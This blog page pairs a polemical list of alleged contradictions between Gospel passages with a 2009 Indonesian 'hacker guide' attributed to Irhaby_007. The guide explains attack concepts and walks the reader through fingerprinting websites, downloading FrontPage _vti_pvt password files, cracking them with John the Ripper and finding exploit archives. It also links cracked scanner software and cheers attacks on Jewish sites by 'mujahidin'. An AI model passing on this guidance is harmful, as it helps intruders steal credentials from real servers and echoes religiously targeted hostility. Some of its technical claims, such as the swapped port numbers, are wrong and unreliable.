Silsilah Yesus dalam Alkitab bisa dilihat di dua kitab Injil yaitu Injil Matius 1:1-17 dan Injil Lukas 3: 23-38. sementara injil Markus dan Injil Yohanes diam seribu bahasa tak tahu menahu tentang silsilah Yesus.
1. Siapakah leluhur Yesus dari Adam sampai dengan Abraham?
  1. Lukas menuliskan 21 nama dalam silsilah dari Adam sampai dengan Abraham.
  2. Matius tidak menuliskan satu nama pun dalam silsilah dari Adam sampai dengan Abraham. Apakah Tuhan tidak memberikan inspirasi Yesus kepada Matius ? Apakah Tuhan pilih kasih terhadap Lukas ? Padahal Lukas termasuk dalam daftar murid Yesus di Injil Matius 10:2-4.
2. Berapa nama silsilah dari Abraham sampai dengan Daud ?
a. Lukas mencatat 15 nama dari Daud sampai dengan Yesus.
b. Matius hanya mencatat 14 nama dari Daud sampai dengan Yesus.

3. Dalam silsilah dari Abraham sampai dengan Daud, siapakah anak Hezron?
a. Anak Hezron adalah Arni (Lukas 3: 33).
b. Anak Hezron adalah Ram (Matius 1: 3).
4. Berapa nama silsilah Daud sampai dengan Yesus ?
  1. Lukas mencatat 43 nama dari Daud sampai dengan Yesus.
  2. Matius hanya mencatat 28 nama dari Daud sampai dengan Yesus.
5. Siapakah kakek Yesus ?
  1. Yakub (Matius 1:6).
  2. Eli (Lukas 3:31).
6. Siapakah anak daud yang menurunkan Yesus ?
  1. Salomo (Matius 1: 6).
  2. Natan (Lukas 3:31).
7. Yesus memasuki Yerusalem naik apa ?
  1. Seekor keledai (Markus ll:7; Lukas 19:35).
  2. Seekor keledai betina dan seekor keledai (Matius 21:7).
8. Ketika Yesus bertemu Yalrus, apakah anak perempuan Yairus sudah mati?
  1. Ya! Sudah mati! (Matius 9:18).
  2. Belum mati! Masih sakit dan hampir! (Markus 5: 23).
9. Bolehkah membawa tongkat dan kasut dalam perjalanan ?
  1. Ya, boleh ! (Markus 6: 7-9).
  2. Tidak, tidak boleh!! (Matius 10: 9- 1 0, Lukas 9: 1-3).
10. Kesaksian Yesus tentang dirinya, benar atau salah ?
  1. Tidak benar (Yohanes 5: 31).
  2. Benar (Yohanes 8:14).
11.  Berapa jumlah orang buta yang bertemu Yesus di Yerikho?
  1. Dua orang buta (Matius 20:29-30).
  2. Hanya satu orang buta saja (Markus 10:46).

12.  Dimana Yesus menemui orang kerasukan setan ?
  1. Di Gedara (Matius 8:28).
  2. Di Gerasa (Markus 5:1-2).
13. Berapa jumlah orang kerasukan setan yang ditemui Yesus ?
  1. Ada 2 orang (Matius 8:28).
  2. Hanya 1 orang saja (Markus 5: 1-2).
14. Apa yang diucapkan Yudas di hadapan Yesus ?
  1. Salam Rabi (Matius 26: 49).
  2. Rabi (Markus 14: 45),
  3. Yudas tidak mengucapkan apa-apa/diam (Lukas 22:47).
15. Ketika Yesus berjalan di atas air, bagaimana respon para muridnya ?
  1. Mereka menyembah Yesus (Matius 14:33).
  2. Mereka tercengang dan bingung (Markus 6:51-52).
16. Jam berapa Yesus disalibkan ?
  1. Jam sembilan (Markus 15:25).
  2. Jam 12 Yesus belum disalibkan (Yohanes 19:14).
17. Yesus membawa damai dan keselematan atau onar ?
  1. Yesus menyelamatkan dunia (Matius 5:9, Yohanes 3:17, Yohanes 10:34-36).
  2. Yesus membawa onar, pedang dan kekacauan keluarga (Matius 10: 34-36).
18. Apa hukumnya bersunat ?
  1. Sunat itu wajib (Kejadian 17:10-14, 17:14, Kejadian 21:4). Yesus tidak membatalkan sunat, (Matius 5: 17-20, Lirkas 2:21). Yesusjuga disunat (lukas 2: 21). Dan orang yang tidak disunat, tidak dapat diselamatkan (Kisah Para Rasul IS: 1-2).
  2. Kata Paulus, sunat tidak wajib, tidak berguna dan tidak penting (Galatia 5:6, I Korintus 7:18-19).
19. Bolehkah makan babi ?
  1. Babi haram dimakan (Ulangan 14:8, Imamat 11:7, Yesaya 66:17).
  2. Kata Paulus, semua daging binatang halal dimakan, tidak ada yang haram (I Korintus 6: 12, I Korintus 10:25, Kolose 2:16, I Timotius 4-5, Roma 14:17).
20. Selain Yesus, adakah yang naik ke sorga ?
  1. Tidak ada! Hanya Yesus saja yang pemah naik ke sorga (Yohanes 3: 13).
  2. Henokh dan Elia telah naik ke sorga (Kejadian 5: 24, II Raja-raja 2. 1 1).


AYAT-AYAT TUHAN YANG RAGU-RAGU :
Tuhan ragu-ragu dalam ispirasi wahyu-Nya, sehingga memakai kata dugaan "kira-kira".
Kira-kira jam 3 malam (Matius 14:25, Markus 6:48), kira-kira jam 3 (Matius 27:46), Kira-kira jam 3 petang (Kisah Para Rasul 10: 3) . Kira-kira jam 4 (Yohanes 1:39), Kira-kira jam 5 petang (Matius 20:6), Kira-kira jam 5 (Matius 20:9), Kirakira jam 9 (Kisah Para Rasul 23:23),
Kira-kira jam 9 pagi (Matius 20:3), Kira-kira jam 12 (Lukas 23:44, Yohanes 19:14), (irakira pukul 12 (Matius 20:5, Yohanes 4: 6, Kisah Para Rasul 10:9), Kira-kira 2 jam (Kisah Para Rasul 19:34), Kira-kira 3 jam (Kisah Para Rasul 5:7).
Kira-kira 12 orang (Kisah Para Rasul 19:7), Kira kira 20 orang (I Samuel 14:14), 1 Samuel 25:13, I Raja-raja 22:6, Kisah Para Rasul 5:36), kira-kira 600 orang (1 Samuel 14: 2,1 Samuel 23:13).
Kira-kira 1000 orang (Yudas 9:49), kira-kira dua atau tiga ribu orang (Yosua 7:3), kira-kira 3000 orang (Yosua 7: 4, Yudas 16:27), kira-kira 3000 jiwa (Kisah Para Rasul 2: 41), kira-kira 4000 orang (1 Samuel 4:2, Markus 8:9), kira-kira 5000 orang (Yosua 8:12), kira-kira 5000 laki-laki (Matius 14:21, Lukas 9:14, Yohanes 6:10, Kisah Para Rasul 4: 4).
Kira-kira 10.000 orang (Yudas 3:29), kira-kira lima belas ribu orang (Yudas 8:10), kira-kira 40.000 orang (Yosua 4:13).
Kira-kira 8 hari (Lukas 9: 28), kira-kira 10 hari (1 Samuel 25: 38), Kira-kira 3 bulan (Kejadian 38: 24. Lukas 1: 56), kirakira 12 tahun (Lukas 8: 42), kira-kira 30 tahun (Lukas 3: 23), kira-kira 100 tahun (Roma 4: 19), kira-kira 450 tahun (Kisah Para Rasul 13: 20).
Kira-kira 50 kati (Yohanes 19: 39), kira-kira 200 hasta (Yohanes 21: 8), kira-kira 2000 ekor babi (Markus 5: 13), kirakira 2 mil (Yohanes 11: 18).
KESAKSIAN PARA TEOLOG KRISTEN :
  1. Dr.G.C Van Niftrik dan Dr. B.J Bolland :
"Kita tidak usah malu-malu, bahwa terdapat berbagai kekhilafan di dalam Alkitab; kekhilafan-kekhilafan tentang angka-angka perhitungan; tahun dan fakta. Dan tak perlu kita pertanggungjawabkan kekhilafan-kekhilafan itu pada caranya, isi Alkitab telah disampaikan kepada kita, sehingga kita akan dapat berkata: "Dalam naskah aslinya tentu tidak terdapat kesalahan-kesalahan, tetapi kekhilafan itu barulah kemudian terjadi di dalam turunan naskah itu. Isi Alkitab juga dalam bentuknya yang asli, telah datang kepada kita dengan perantaraan manusia" (Dogmatika Masa Kini, BPK Jakarta,1967, hal 298).
  1. Dr. Mr D.C Mulder:
"Jadi benarlah Daud itu pengarang Mazmur yang 73 jumlahnya ? Hal itu belum tentu. Sudah beberapa kali kita suci menjumpai gejala bahasa orang Israel suka menggolongkan karangan-karangan di bawah nama orang yang termasyhur ....... Oleh karena itu tentu tidak mustahil pengumpulan-pengumpulan mazmur-mazmur itu (atau orang-orang yang hidup lebih kemudian) memakai nama Daud, karena raja itu termasyhur sebagai pengarang mazmur-mazmur. Dengan kata lain perkataan, pemakaian nama Daud, Musa, Salomo itu merupakan tradisi kuno, yang patut diperhatikan, tetapi tradisi itu tidak mengikat" (Pembimbing ke Dalam Perjanjian Lama, BPK Jakarta, 1963 hal. 205).
  1. Dr. Welter Lempp;
"Susunan semesta alam diuraikan dalam Kitab Kejadian I tidak dapat dibenarkan lagi oleh ilmu pengetahuan modern" (Tafsiran Kejadian, hal 58). "Pandangan Kejadian I dan seluruh Alkitab tentang susunan semesta alam adalah berdasarkan ilmu kosmografi bangsa Babel. Pandangan itu sudah ketinggalan jaman" (Tafsiran Kejadian, hal, 65).
  1.  Dr. R. Soedarmo:
"Dengan pandangan bahwa Kitab Suci hanya catatan saja dari orang, maka diakui juga bahwa di dalam Kitab Suci mungkin sekali ada kesalahan. Oleh karena itu Kitab Suci mungkin sekali ada kesalahan. Oleh karena itu Kitab Suci denganbentuk sekarang masih dapat diperbaiki" (Ikhtisar Dogamtika, BPK Jakarta, 1965 hal. 47). "Di dalam Perjanjian Baru pun ada kitab-kitab yang diragukan antara lain Surat Wahyu dan Yakobus yang disebut surat Jeram" (Ikhtisar Dogmatika, BPK Jakarta, 1965 hal. 49).

"subhanaka laa 'ilma lanaa illa maa 'allamtana, faqina 'adzaabannaar" semoga bermanfaat, walhamdulillah robbil 'aalamin...

Senin, 11 April 2011

Panduan Hacker dari Irhaby_007 Kamis, 30 April 2009


Kalian tidak akan bisa jadi hacker sejati dalam sehari semalam.
Juga, hacker sejati bukanlah mereka yang main pake program bikinan orang. Hacker sejati adalah yang bisa memunculkan berbagai penemuan baru.
Sebab, keberhasilan yang berhasil dicapai seorang hacker, siapa pun orangnya, tetap saja keberhasilan itu dinisbatkan kepada si penemu program.
Jadi bisa saja apa buah karya hacker lain menjadi terkenal manakala program yang ia rancang sampai ke tangan semua orang. Padahal, ini belum berbicara kemungkinan si hacker pembuat program yang kamu pakai menyisipkan celah-celah yang memungkinkan dia meng-hack komputer kamu ketika kamu menggunakan program tersebut.

ISTILAH-ISTILAH DASAR:

1. TEL-NET
Ini adalah program berukuran kecil yang ada di sistem operasi windows. Dengan menguasai program ini, kita bisa melakukan koneksi dengan server atau operator dan melakukan aksi apa pun sesuai dengan tingkat penguasaan. Biasanya, hacker memakai Tel-net untuk mengetahui cara mengaktifkan sebuah situs, berikut server yang digunakan, kemudian melakukan koneksi dengan port tertentu –khususnya port FTP— untuk bisa menyusup ke situs yang akan diserang secara sembunyi-sembunyi, sehingga bisa membaca file-file situs tersebut dan mencuri file password maupun yang lain dari explorernya. Untuk mengaktifkan tel-net, silahkan klik:
START à RUN àTelnet
Setelah itu akan muncul tampilan Tel-net. Ada satu program yang mirip dengan Telnet, namanya program SSH, ia memiliki ciri khas dalam masalah coding. Cuman, data-data yang akan ditransfer mesti menggunakan coding. Wallohu A‘lam.

2. PROGRAM SCANNER
Ini adalah salah satu program yang fungsi utamanya men-scan situs dan menyingkap celah-celahnya (atau diistilahkan: bugs) jika ada. Cara kerja program ini terhitung cepat. Di samping itu, program ini punya base (landasan) yang luas dan besar. Program ini juga berisi beberapa daftar bugs dan eksploit (salah satu jenis penyerangan bugs dengan cara khusus) yang biasanya dipakai pada suatu situs untuk mengetahui servernya dapat diserang pada celah tertentu atau tidak. Di antara program yang memiliki perangkat ini adalah Shadow Security Scanner, Stealth, dan Omran Fast.

3. EKSPLOITS
Adalah program penembus yang dijalankan melalui windows eksplorer. Program ini memakai alamat URL. Eksploit mampu menampilkan file-file sebuah situs, bahkan sebagian ada yang bisa masuk dan berselancar di dalam server. Ada juga Eksploit yang mampu menyerang port tertentu di dalam server dengan melakukan “crack”, yang disebut program Over Flow Eksploits Buffer. Ada bermacam-macam Eksploits, di antaranya adalah: CGI Exploits, CGI Bugs, Unicode’s Exploits, Buffer over Flow Exploits, PHP Exploits, DOS Exploits. Semua program di atas juga berfungsi melindungi server dari serangan jika terdapat bugs, walaupun server tersebut tidak dilengkapi dengan program Fire Wall sama sekali. Ada juga beberapa ekspoits yang ditulis dengan bahasa C, berekstensikan: ***.c
Exploits jenis ini memerlukan compiler atau program penerjemah yang akan menerjemahkannya menjadi eksploits yang dijalankan dengan cara biasa pada explorer.
Untuk merubah eksploits-eksploits berbahasa C menjadi ekploits yang bisa dipakai secara biasa, diperlukan sistem operasi Linux atau Unix, atau program compiler lain yang bisa dipakai dalam sistem operasi windows. Program compiler paling terkenal yang berfungsi sebagai penerjemah dan pengubah, adalah program Borland Compiler C++, program ini biasa digunakan untuk sistem operasi windows.

4. FIRE WALL (Dinding Api)
Ini adalah program yang dipakai untuk melindungi server dari “tamu-tamu” tak diundang yang memasuki file-filenya. Fire Wall bisa dikatakan sebagai pelindung paten dari server. Hanya, perlu saya ingatkan, bahwa program-program Fire Wall yang dipakai untuk memprotek suatu situs, berbeda dengan sistem proteksi yang dipakai untuk melindungi PC.

5. SHADOWED PASSWORD FILE (File Pass Word yang Terselubung)
Ini adalah file yang berisi password dengan bentuk *, atau x. Untuk file password biasa, sintaks-nya adalah sebagai berikut:
Username: passwd: UID: GID: full name: directory: shell
Pada sintaks di atas, Antum bisa menemukan kode password setelah Username dan titik dua.
Adapun pada file yang telah dishadow, bentuk sintaksnya berubah menjadi:
Username: x: 503: 100: Full Name: /home/username: /bin/sh
Di sini, jelas bahwa posisi kode password telah dirubah bentuknya menjadi “x”.
Setelah file password di shadow, Antum bisa menjumpai file password lain yang berisi kode password.File inilah yang disebut Shadow File, Antum bisa temukan pada directory berikut:
/etc/shadow
Pada file, bentuk sintaksnya adalah:
Username: passwd: last: may: must: warn: expire: disable: reserved
Kali ini, Antum bisa meng-copy kode password dari sintaks di atas, lalu meletakkannya pada file yang sudah ter-shadow, sehingga file yang terselubung itu berubah seperti file password biasa.

6. ANONYMOUS CONDITION
Kondisi tersamar dan tidak dikenal ketika memasuki sebuah situs yang di-hack. 
Ada program yang hampir mirip dengan FTP, yang memiliki kelebihan bisa Antum gunakan memasukiserver dengan kondisi samar, setelah itu mencuri file-file yang ada di dalamnya (jika memang serveritu mengizinkan).

7. CELAH-CELAH YANG TIDAK TERPROTEKSI (VULNERABILITIES)
Yaitu celah-celah atau titik-titik lemah (bugs) yang tidak terjaga, atau memungkinkan untuk diserang, pada sebuah server. Ini merupakan bahaya keamanan bagi server, karena bisa digunakan para hackeruntuk menyerangnya, meng-hacknya, atau bahkan menghancurkannya.
Vulnerable artinya adalah celah, atau lebih tepatnya titik lemah, atau posisi yang tidak diamankan dengan baik. Kata-kata ini banyak sekali tercantum pada daftar e-mail yang masuk pada situs-situs yang isinya terfokus pada masalah security dan keamanan jaringan. Contohnya pada daftar e-mail yang tercantum pada situs Security Focus, alamatnya adalah: http://www.securityfocus.com Atau pada Booktrack-nya, yaitu: http://www.securityfocus.com/archive/1. Dan lain-lain.

8. PASSWORD FILE (File Password)
Adalah file yang berisi kode password pada Root dan password-password user yang dibolehkan memasuki server. Password situs tentu saja juga ada dalam file ini.
Yang perlu dicatat di sini, semua password di dalam file ini masih berbentuk sandi.

9. Root (Akar)
Maksudnya adalah pengguna paling utama dalam sebuah aturan situs, dialah yang bisa berbuat apa saja terhadap semua file yang ada dalam situs dan server, sejak dari men-delete, menambah, mau pun memperbaiki file-file yang ada (atau dalam sistem operasi windows setara dengan administrator). Nah, biasanya, password Root adalah password situs juga, jika situs itu dioperasikan dengan menggunakan sistem operasi Lynux, Unix, Sholary, Free BSD, atau yang sejenis.

10. SERVER
Server adalah perangkat operasi sebuah situs, semua file suatu situs terletak di dalamnya. Jadi, serveradalah perangkat komputer biasa, sama seperti perangkat-perangkat lain, hanya ia memiliki banyak kelebihan seperti besarnya memori dan kecepatan akses yang luar biasa. Server selalu tersambung dengan internet selama 24 jam. Koneksi terhadap server inilah yang menjadikan situs bisa diakses dan digunakan dalam jaringan internet selama 24 jam. Satu server bisa menampung lebih dari satu situs, tergantung pada jenis server dan perusahaan yang memilikinya. Serangan hacker, jelas ditujukan untuk menyerang server yang banyak memiliki situs; sehingga dengan begitu akan mudah untuk meng-hack semua situs yang ada di bawah ayahan-nya. Selanjutnya, terserah, bisa menghancurkan situs-situs tersebut, mempermainkan file-filenya, memperburuk tampilannya (deface), mencuri data-data, merusaknya, atau bahkan men-delete nya sama sekali dari sebuah situs. Dan alhamdulillah,inilah yang sering menimpa situs-situs yahudi, jazakumulloh khoiron ya…! wahai para mujahidin.

11. BUFFER OVER FLOW
Ini adalah salah satu dari sekian jenis Eksploits, yang digunakan untuk menyerang salah satu titik padaserver (port server) sehingga titik tersebut penuh. Misalnya menyerang port FTP, atau yang lain. Tujuannya untuk memperlemah koneksi server, atau memutusnya sama sekali dengan port-port yang ada. Atau untuk menghilangkan proteksi yang ada, sehingga server bisa dimanfaatkan sewaktu-waktu tentunya setelah terlebih dahulu meng-crack server tersebut. Ketika nanti kembali terkoneksi denganserver itu, dengan mudah server itu bisa digunakan dan mengambil data-data di sana tanpa ada satu penghalang pun (sebab setelah meng-crack proteksi suatu server, memasukinya menjadi sangat mudah tanpa ada penghalang berarti). Ini mirip dengan aksi pemutusan sistem operasi, sebab ini sama dengan melakukan overload pada salah satu titik dalam server.

12. BOX
Banyak para hacker yang gemar memakai istilah Box ketika menyebut kata “Supercomputer”, “Server”, atau “PC”.

13. SUPER USER
Yaitu sistem yang akan kita serang nanti –dengan pertolongan Allah, daya dan kekuatan-Nya—yang beranggotakan beberapa user. User yang memiliki hak total –atau hampir total—biasa disebut Super User. Super User biasanya menjad Root, Admin, atau pemimpin sistem dalam situs.

14. SHELL ACCOUNT
Shell account adalah sebuah sistem operasi, yang dengannya Antum bisa mengendalikan komputer dari jarak jauh. Tetapi komputer itu harus berbasis linux. Antum bisa memasuki sistem operasi Shell Account melalui Tell Net atau SSH, yang sudah kami bahas di muka.

15. WEB SERVER
Yang paling populer ada dua:
- IIS dari Microsoft. Ini banyak sekali memiliki celah, (situs-situs pengguna web server ini yang celahnya tertutup sangat sedikit)
- APACHE. Ini berasal dari kumpulan programmer di seluruh dunia. Menghack nya boleh dibilang cukup sulit. Sebab apache adalah web server yang sumbernya terbuka dari mana saja dan selalu mengalami perkembangan.

16. SYSTEM
Ada banyak sekali sistem, di antaranya: SunOS, FreeBSD, OpenBSD, NetBSD, AIX, IRIX, Windows/NT/2000/xp, Linux dengan berbagai versinya, seperti Red Hat, Veduro, dll

17. LINUX
Linux mempunyai enam direktori, yaitu:
- Bin, khusus untuk file-file binary (digital) untuk mengoperasikan sistem
- Etc, yaitu file-file berisikan semua administrasi sistem, termasuk account
Root yang merupakan inti pengendali sistem, termasuk juga password. (Bagian ini sangat penting sekali untuk dipelajari dan dibuka isinya ketika kita akan melakukan aksi hacking, biidznillah…)
- Dev, berisi file-file program
- Lib, berisi kumpulan data tentang sambungan dinamik yang membantu sistem dalam beroperasi
- Tmp, yaitu file-file sementara dan tidak tetap
- Usr, berisi nama-nama user sekaligus password mereka yang memiliki account dalam sistem (mempelajari bagian ini juga tak kalah pentingnya)

18. PERINTAH-PERINTAH (COMMAND) DALAM “FTP”
a. “pwd”, berfungsi untuk mengetahui isi harddisk.
b. “cd”, berfungsi untuk menerobos folder atau direktori suatu sistem operasi. Contoh, ketika saya menulis: Cd black, berarti saya sedang menerobos masuk ke dalam bagian yang disebut “black.”
c. “is”, untuk mengetahui isi dari bagian utama suatu sistem operasi, bisa juga untuk mengetahui isi hardisk. Sama dengan perintah “dir” dalam DOS.
d. “get”, berfungsi untuk mendownload file yang diinginkan. Contoh: get black.exe, maka maksudnya adalah mendownload file “black.exe” dari server untuk diletakkan pada komputer Antum, pada bagian utama yang sedang Antum buka sebelum mengetikkan perintah FTP (biasanya tercantum pada desktop)
e. “put”, yang merupakan kebalikan dari “get”. Artinya, Antum mengambil file milik Antum, laluAntum letakkan pada komputer korban. Contoh: put black.exe. Di sini, file yang akan ditaruh itu harus ada di bagian utama yang sedang Antum akses sebelum menjalankan FTP, dan biasanya itu ada pada desktop.
f. “close”, yang berfungsi untuk memutuskan koneksi dengan korban. Antum bisa mengoperasikan FTP pada windows, caranya: klik START
��RUN��ftp –n hostname

19. PORT-PORT DALAM PROGRAM
1) 7 Echo
2) 21 Telnet
3) 23 ftp
4) 25 SMTP
5) 80 http
6) 110 pop

20. MEMPERHATIKAN PERINGATAN TERJADINYA KESALAHAN TERTENTU (ERROR)
Yang paling populer adalah peringatan Error 404, peringatan ini muncul ketika kita meminta sebuah file yang tidak ada pada situs. Ketika muncul tampilan peringatan seperti ini, perhatikan di bagian bawah, tercantum beberapa data, salah satunya adalah sumber (source) dari web server. Data-data itu tidak penting dan tidak terlalu berbahaya, namun ada gunanya ketika nanti kita melakukan aksihacking, bi idznillah…

21. LETAK-LETAK FILE PASSWORD BERADA
Daftar berikut ini disesuaikan dengan sistem operasi yang digunakan,
a. Pada SunOS 5.0 :etc/passwd atau ets/shadow
b. Pada linux :etc/passwd atau ets/shadow
c. Pada BSD 4.3 –RENO :etc/master.passwd
d. AIX :etc/security/passwd
e. WINDOWS NT :script/passwd

22. PROGRAM JHON THE RIPPER
Salah satu program terbaik untuk memecahkan kode rahasia (password) yang didapat oleh para hackerdari sistem operasi nix* (maksudnya Linux dan Unix). Sistem operasi nix* ini –apalagi yang versi paling anyar—berisi sistem proteksi tambahan di samping file password, artinya file password itu ter-shadow(terselubung). Maka, seorang hacker harus terlebih dahulu mendapatkan file shadow untuk bisa mendapatkan file password yang terselubung itu. Setelah menemukan file itu, barulah ia bisa memecahkan passwordnya. Inilah sebenarnya yang menjadi pekerjaan utama dan menurut saya merupakan langkah paling penting, dalam menyerang sistem operasi. Sebab, ini yang akan memberikan kunci kepada Antum, dengan pertolongan Allah SWT.

LANGKAH MELAKUKAN HACKING

Akhi karim… sebelum kita melanjutkan pembahasan ini secara lebih dalam, Antum harus catat bahwa langkah nge-hack yang akan kami jelaskan berikut ini hanya satu dari sekian cara yang banyak, dan bisa jadi langkah ini sudah tidak up to date.

Tapi yang penting, yang harus Antum ketahui di sini adalah, bagaimana sih melakukan hack secara umum? Bagaimana Antum tahu cara mencari bugs dari sistem-sistem,
kemudian bagaimana cara memanfaatkan bugs tersebut. Dengan mengetahuinya, atas pertolongan Alloh akan membantu maksud mulia kita.

Langkah pertama dalam hacking adalah mengumpulkan data. Artinya, dalam suatu situs, kita harus tahu web servernya, sistem operasinya apa, dan program bantu apa saja yang dipakai. Misalnya, kita sekarang menghadapi sebuah situs. Nah, kemudian, bagaimana caranya agar kita bisa mengetahui sistem operasinya, web server nya, program bantunya, dan semua data tentang situs tersebut.

Untuk mengetahui semua ini, bisa kita masukkan nama situs yang kita maksud pada salah
satu website di bawah ini. Website-website ini akan memberikan data ringkas kepada kita
tentang sistem operasi yang digunakan situs tersebut, web servernya, dan lain sebagainya.

Website-website itu adalah: http://www.netcraft.net/ Dan http://www.whois.com/
Catatan penting:
Jangan mengetikkan http:// atau tanda / yang ada di akhir alamat URL, ketika Antum mengetik alamat website di atas. 

Antum juga bisa mendapatkan data-data tentang sebuah situs dengan cara mencoba memasuki situs tersebut melalui program Tel Net.


a. Contoh situs pengguna IIS sebagai web server

Kalau kita memasukkan nama sebuah situs pada website netcraft, akan muncul data-data berikut:
This site http://www.***.com is running
Microsoft-Windows 2000 on IIS/5.0

Ok…dari sini, kita mendapatkan dua data penting. Pertama, situs ini menggunakan ISS 5.0 sebagaiweb server.
Kedua, sistem operasi yang dipakai adalah windows 2000.

Langkah yang harus dilakukan berikutnya adalah:
1. Kita coba untuk mencari bugs yang ada pada IIS 5.0 pada situs ini. Ok,sekarang, ada satu hal lagi yang harus dikuasai, yaitu masalah Unicode. Dengan Unicode, sebuah situs bisa diserang melalui explorer-nya, hanya saja Unicode tidak berfungsi untuk selain web server ISS. Unicode adalah alamat panjang yang dituliskan di bagian belakang, setelah menulis alamat sebuah situs.
2. Kalau tidak ketemu juga bugs nya, kita coba untuk mencari bugs dari Windows 2000. Ok, sementara kita anggap langkah ini pun tak membuahkan hasil. Jadi…?
3. Lihatlah isi situs tersebut, barangkali di sana ada menu login sebagai pengunjung, atau menu forum (muntada dalam bahasa arabnya), atau yang semisal…

(Ini adalah contoh dalam memilih cara menyerang situs, yaitu dengan berdasarkan data sebuah situs kita berusaha mencari bugs yang bisa dimasuki untuk menyerang situs tersebut, dengan bantuan Alloh tentunya.


b. Contoh situs pengguna Apache sebagai web server

Kita ambil contoh situs:
http://www.arank.com/
Kalau situs ini kita kupas dengan situs netcraft, hasilnya adalah:
The site http://www.arank.com/is running
Apache/1.3.20 (UNIX) mod_gzip/1.3.19.1a
mod_perl/1.26 mod_bwlimited/0.8 PHP/4.0.6
mod_log_bytes/0.3 FrontPage/5.0.2.2510
mod_ssl/2.8.4 OpenSSL/0.9.6 on Linux


Ada tiga hal penting buat kita pada data di atas:
1. Web servernya adalah Apache 1.3.20
Pertama yang harus kita ingat, Apache adalah web server yang sulit diserang (tapi bukan mustahil lho…), kecuali beberapa versi saja yang agak mudah. Ok, sementara kita lewati dulu pencarian bugs pada web server Apache.
2. Situs ini ternyata menggunakan program bantu Front Page /5.0.2.2510. Na…untuk program ini banyak sekali celahnya.
3. Sistem operasi yang dipakai adalah Linux. Menyerang sistem Linux boleh dikata paling sulit daripada sistem operasi lain. Wallôhu A‘lam

Baiklah, sekarang akan coba kita jabarkan kelemahan-kelemahan yang ada pada program
Front Page.

Seperti sudah kami katakan, program ini banyak sekali memiliki kelemahan. Kelemahannya di samping banyak juga besar, kira-kira begitu lah… Di antara kelemahan itu adalah folder _vti_pvt dan private. Inilah bagian yang akan kita serang, karena untuk folder lain biasanya tidak terlalu berguna. Dalam duafolder ini, akan kita temukan empat file penting, yaitu:
1) service.pwd
2) users.pwd
3) authors.pwd
4) administrators.pwd

Ini adalah file paling bahaya, kalau lah kita hanya bisa mendownload satu dari empat file ini, (ingat, celah seperti ini ada pada 70% situs-situs yang tersebar di dunia maya), kemudian kita buka file itu dengan mafkarah, akan kita lihat hasil berikut:
Goodyco: CalXS8USI4TGM

Ini kita ambil dari sebuah situs tertentu…
http://www.***.com/_vti_pvt/service.pwd
Dari sini kita ketahui, Goodyco adalah usernya, sedangkan password yang masih tersandi itu adalah CalXS8USI4TGM. Selanjutnya, bagaimana memecahkan kode password ini?

Kita akan memecahkan kode password ini melalui program Jhon The Ripper (penjelasan tentang penggunaan program ini ada di akhir pembahasan, Insyâ Allôh)

Sekarang kita beralih kepada bagian ketiga yaitu sistem operasi yang digunakan. Seperti kita ketahui dari data di atas, sistem operasi yang dipakai situs itu adalah Linux. Tapi, linux yang versi apa? Ada linux Red hat, ada Mandrix, dan banyak lagi versi lain, dan bugs nya pun juga lebih banyak lagi. Tetapi, yang jelas pada saat seperti ini Antum akan menghadapi dua masalah. 

Pertama, bagaimana mengetahui jenis sistem operasinya?
Antum bisa mengambil informasi tentang sistem operasi yang dipakai melalui program Tel Net. Caranya, tulis alamat URL situs, nanti akan muncul data tentang sistem operasinya: jenisnya, versinya, dst.

Masalah kedua, Antum mesti punya sistem Linux, sebab bugs yang ada menggunakan bahasa C, padahal bahasa C hanya bisa dipakai dalam sistem operasi Linux saja.

Kesimpulan:
Dari penjabaran di atas, nampak bahwa aksi hacking itu terdiri dari dua bagian: pertama, mengumpulkan data tentang situs yang menjadi target, kemudian kedua melakukan serangan ke situs itu berdasarkan data yang didapat. 

Pada keterangan tadi, kita telah menyelesaikan urusan mengumpulkan data. Sekarang, bagaimana cara melakukan serangan kepada target, berdasarkan data yang sudah
dikumpulkan. Ada beberapa situs, yang menampilkan bugs-bugs dari web server, sistem operasi, dsb, secara berkala dan up to date. Inti tugas kita selanjutnya adalah, mempelajari bugs-bugs itu, lalu memanfaatkannya secara benar, dengan pertolongan Alloh tentunya.

Situs yang menyediakan jasa penampilan bugs ini, di antaranya adalah: http://www.ussbrack.com/

Situs ini sangat-sangat penting. Setelah membukanya, cari menu Exploits yang ada di bagian kiri tampilan, lalu klik pilihan pertama. Di sini akan Antum temukan semua bugs pada semua sistem operasi, sejak dari Linux, Windows, dll; jenisnya pun bermacam-macam, ada bahasa C, Perl, Unicode, dsb.

Ada situs lain yang semisal, yaitu: http://www.neworder.box.sk
Situs ini sangat membantu sekali. Sekedar contoh, coba Antum tulis pada kotak yang ada pada bagian kiri situs ini: IIS, atau: Apache, atau nama forum sebauh situs dan nama yang mengeluarkannya, atau program apa saja yang menurut Antum terlihat ada celah kelemahannya.

Situs-situs penyedia Archive berisi bermacam-macam bugs:
www.securiteam.com/exploits/archive.html
www.ussrback.com
www.secureroot.com
http://www.rootshell.com
www.secureroot.com/category/exploits

Ada juga program yang fungsinya adalah mencari bugs pada suatu situs, lalu menyuguhkannya kepadaAntum dalam “nampan emas” (saking mudahnya kali…penerj.), program ini adalah program terbaik untuk mencari bugs, semoga Alloh selalu menjadikan maksud tujuan kita sempurna untuk meraih semua kebaikan yang Dia ridhoi.

1. Program Shadow Security Scanner
Untuk mendown load program ini, Antum bisa meng-klik link berikut ini (juga tutorial tentang programcrack): http://mirror1.safety-lab.com/SSS.exe
Untuk download program crack: http://www.aldamar.net/index_files/license.zip
Untuk download program transfer ke dalam bahasa arab:http://www.aldamar.net/index_files/ssslanguage.zip
Untuk download link penjelasan tutorial program ini, klik:http://www.aldamar.net/index_files/ssslanguage.zip

Program ini sangat populer dan memiliki kecepatan tinggi dalam mencari celah dan bugs suatu situs. Setelah di download, lakukan penginstalan dan pengoperasikan program. Antum akan dimintaupdating, klik saja Yes. Setelah itu, matikan program ini. Tugas utama Antum adalah membuat file License.key dari hasil cracking, setelah itu meletakkan file ini dalam program. Setelah itu, jalankan kembali program, maka file akan terbuka. Kemudian, Antum akan ditanya,
“Apakah Anda mau Mendaftar?” jawab dengan mengklik button Done. Penjelasan seputar program, sudah ada di dalam link di atas, Alhamdulillah…

2. Program CGI Scanner
Ini adalah program khusus yang mencari bugs CGI. Program ini adalah yang terbaik untuk mencari bugsini, wallôhu A‘lam… program ini –alhamdulillah— juga sudah ada di daftar link di atas.

3. Program Uni Scan
Antum bisa mendapatkan program ini pada link berikut:http://online.securityfocus.com/data/tools/uniscan.zip
